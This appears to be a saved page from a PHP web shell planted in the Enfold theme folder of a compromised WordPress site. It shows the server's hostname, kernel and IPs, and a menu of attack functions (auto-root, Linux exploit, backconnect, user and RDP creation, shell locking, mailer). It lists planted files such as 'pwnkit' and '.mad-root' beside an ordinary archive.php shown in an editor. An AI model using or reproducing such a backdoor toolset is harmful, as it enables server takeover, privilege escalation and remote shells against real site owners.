Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.121.20.2 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
5.4.45
urgencetin
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
urgencetin /
www /
wp-content /
themes /
enfold /
[ HOME SHELL ]
Name
Size
Permission
Action
config-bbpress
[ DIR ]
drwxr-xr-x
config-events-calendar
[ DIR ]
drwxr-xr-x
config-gravityforms
[ DIR ]
drwxr-xr-x
config-layerslider
[ DIR ]
drwxr-xr-x
config-templatebuilder
[ DIR ]
drwxr-xr-x
config-woocommerce
[ DIR ]
drwxr-xr-x
config-wordpress-seo
[ DIR ]
drwxr-xr-x
config-wpml
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
.DS_Store
6
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.php
72
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive-more.php
181.05
KB
-rw-r--r--
archive.php
3.12
KB
-rw-r--r--
author.php
1.86
KB
-rw-r--r--
comments.php
4.98
KB
-rw-r--r--
conf.php
26.76
KB
-rw-r--r--
footer.php
6.18
KB
-rw-r--r--
forum.php
1.79
KB
-rw-r--r--
functions-enfold-interface.php
25.92
KB
-rw-r--r--
functions-enfold.php
57.34
KB
-rw-r--r--
functions.php
39.53
KB
-rw-r--r--
functions.php_bak
20.59
KB
-rw-r--r--
functions.txt
20.59
KB
-rw-r--r--
header.php
2.56
KB
-rw-r--r--
index-ajax-response.php
546
B
-rw-r--r--
index.php
2.58
KB
-rw-r--r--
page.php
1.36
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
screenshot.png
144.35
KB
-rw-r--r--
search.php
2.12
KB
-rw-r--r--
searchform.php
1.27
KB
-rw-r--r--
sidebar.php
3.66
KB
-rw-r--r--
single-portfolio.php
1.4
KB
-rw-r--r--
single.php
2.02
KB
-rw-r--r--
style.css
1.16
KB
-rw-r--r--
tag-statement.php
546
B
-rw-r--r--
tag.php
5.98
KB
-rw-r--r--
taxonomy-portfolio_entries.php
1.78
KB
-rw-r--r--
template-archives.php
7.35
KB
-rw-r--r--
template-blank.php
647
B
-rw-r--r--
template-builder.php
2.83
KB
-rw-r--r--
wpml-config.xml
2.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php if ( !defined('ABSPATH') ){ die(); } global $avia_config, $more; /* * get_header is a basic wordpress function, used to retrieve the header.php file in your theme directory. */ get_header(); $showheader = true; if(avia_get_option('frontpage') && $blogpage_id = avia_get_option('blogpage')) { if(get_post_meta($blogpage_id, 'header', true) == 'no') $showheader = false; } if($showheader) { echo avia_title(array('title' => avia_which_archive())); } do_action( 'ava_after_main_title' ); ?> <div class='container_wrap container_wrap_first main_color <?php avia_layout_class( 'main' ); ?>'> <div class='container template-blog '> <main class='content <?php avia_layout_class( 'content' ); ?> units' <?php avia_markup_helper(array('context' => 'content','post_type'=>'post'));?>> <?php $tds = term_description(); if($tds) { echo "<div class='category-term-description'>{$tds}</div>"; } ?> <?php $avia_config['blog_style'] = apply_filters('avf_blog_style', avia_get_option('blog_style','multi-big'), 'archive'); if($avia_config['blog_style'] == 'blog-grid') { global $posts; $post_ids = array(); foreach($posts as $post) $post_ids[] = $post->ID; if(!empty($post_ids)) { $atts = array( 'type' => 'grid', 'items' => get_option('posts_per_page'), 'columns' => 3, 'class' => 'avia-builder-el-no-sibling', 'paginate' => 'yes', 'use_main_query_pagination' => 'yes', 'custom_query' => array( 'post__in'=>$post_ids, 'post_type'=>get_post_types() ) ); $blog = new avia_post_slider($atts); $blog->query_entries(); echo "<div class='entry-content-wrapper'>".$blog->html()."</div>"; } else { get_template_part( 'includes/loop', 'index' ); } } else { /* Run the loop to output the posts. * If you want to overload this in a child theme then include a file * called loop-index.php and that will be used instead. */ $more = 0; get_template_part( 'includes/loop', 'index' ); } ?> <!--end content--> </main> <?php //get the sidebar $avia_config['currently_viewing'] = 'blog'; get_sidebar(); ?> </div><!--end container--> </div><!-- close default .container_wrap element --> <?php get_footer(); ?>
Close